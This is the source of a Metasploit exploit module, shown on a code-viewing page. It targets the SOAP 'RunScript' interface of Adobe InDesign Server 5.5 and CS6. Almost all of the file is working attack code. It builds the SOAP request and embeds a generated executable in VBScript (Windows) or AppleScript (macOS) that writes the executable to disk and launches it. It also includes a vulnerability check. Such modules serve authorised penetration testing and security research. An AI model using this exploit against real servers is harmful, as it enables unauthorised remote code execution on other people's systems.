Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/misc/indesign_server_soap.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::EXE1011def initialize(info = {})12super(update_info(info,13'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',14'Description' => %q{15This module abuses the "RunScript" procedure provided by the SOAP interface of16Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).1718The exploit drops the payload on the server and must be removed manually.19},20'Author' =>21[22'h0ng10', # Vulnerability discovery / Metasploit module23'juan vazquez' # MacOSX target24],25'License' => MSF_LICENSE,26'Platform' => %w{ osx win },27'Privileged' => false,28'DisclosureDate' => '2012-11-11',29'References' =>30[31[ 'OSVDB', '87548'],32[ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]33],34'Targets' =>35[36[37'Indesign CS6 Server / Windows (64 bits)',38{39'Arch' => ARCH_X64,40'Platform' => 'win'41}42],43[44'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',45{46'Arch' => ARCH_X64,47'Platform' => 'osx'48}49]50],51'DefaultTarget' => 052))5354register_options( [ Opt::RPORT(12345) ])55end565758def send_soap_request(script_code, script_type)59script_code.gsub!(/&/, '&')60soap_xml = %Q{61<?xml version="1.0" encoding="UTF-8"?>62<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"63xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"64xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">65<SOAP-ENV:Body>66<IDSP:RunScript>67<IDSP:runScriptParameters>68<IDSP:scriptText>#{script_code}</IDSP:scriptText>69<IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>70</IDSP:runScriptParameters>71</IDSP:RunScript>72</SOAP-ENV:Body>73</SOAP-ENV:Envelope>74}7576res = send_request_cgi({77'uri' => '/',78'method' => 'POST',79'content-type' => 'application/x-www-form-urlencoded',80'data' => soap_xml,81}, 5)82end838485def check()86# Use a very simple javascript87check_var = rand_text_numeric(10)88checkscript = 'returnValue = "' + check_var + '"'8990res = send_soap_request(checkscript, "javascript")9192return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type="xsd:string">' + check_var + '</data>')9394return Exploit::CheckCode::Safe95end9697def exploit9899if target.name =~ /Windows/100print_status("Creating payload vbs script")101encoded_payload = generate_payload_exe().unpack("H*").join102exe_file = Rex::Text.rand_text_alpha_upper(8) + ".exe"103wsf = Rex::Text.rand_text_alpha(8)104payload_var = Rex::Text.rand_text_alpha(8)105exe_name_var = Rex::Text.rand_text_alpha(8)106file_var = Rex::Text.rand_text_alpha(8)107byte_var = Rex::Text.rand_text_alpha(8)108shell_var = Rex::Text.rand_text_alpha(8)109110# This one creates a smaller vbs payload (without deletion)111vbs = %Q{112Set #{wsf} = CreateObject("Scripting.FileSystemObject")113#{payload_var} = "#{encoded_payload}"114#{exe_name_var} = #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"115Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)116For x = 1 To Len(#{payload_var})-3 Step 2117#{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)118#{file_var}.write Chr(#{byte_var})119Next120121#{file_var}.write Chr(#{byte_var})122#{file_var}.close123124Set #{shell_var} = CreateObject("Wscript.Shell")125#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False126Set #{shell_var} = Nothing127returnValue = #{exe_name_var}128}129# vbs = Msf::Util::EXE.to_exe_vbs(exe)130print_status("Sending SOAP request")131132res = send_soap_request(vbs, "visual basic")133if res != nil and res.body != nil then134file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]135print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"136end137138elsif target.name =~ /Mac OS X/139140print_status("Creating payload apple script")141142exe_payload = generate_payload_exe143b64_exe_payload = Rex::Text.encode_base64(exe_payload)144b64_payload_name = rand_text_alpha(rand(5) + 5)145payload_name = rand_text_alpha(rand(5) + 5)146147apple_script = %Q{148set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission149write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp150close access fp151do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"152do shell script "rm /tmp/#{b64_payload_name}.txt"153do shell script "chmod +x /tmp/#{payload_name}"154do shell script "/tmp/#{payload_name}"155set returnValue to "/tmp/#{payload_name}"156}157158print_status("Sending SOAP request")159160res = send_soap_request(apple_script, "applescript")161162if res != nil and res.body != nil then163file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]164file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? or file_to_delete.empty?165print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"166elsif not res167print_status "No response, it's expected"168print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"169end170171end172173end174end175176177